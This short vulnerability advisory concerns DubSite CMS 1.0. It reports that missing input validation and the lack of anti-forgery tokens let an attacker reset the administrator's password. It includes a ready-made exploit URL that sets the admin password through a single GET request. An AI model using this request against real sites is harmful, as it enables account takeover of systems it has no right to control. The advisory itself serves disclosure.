|
Brought to you by:
Suppliers of:
|
|
|
| |
| An attacker is able to change the password of the administrative user thus having complete control over the site. The risk is estimated as HIGH. |
| |
Credit:
The information has been provided by Luis Santana.
|
| |
Vulnerable Systems:
* DubSite CMS version 1.0
Due to the lack of multiple input validation errors, an attacker is able to change the password of the administrative user.
The following link will change the password of the administrative account. Changing the options will also allow you to change the name of the admin account:
http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=own3d&userpassword2=own3d&role_id=1&active=1&update=Update
To fix the bugs a token system is highly advised
|
|
|
|
|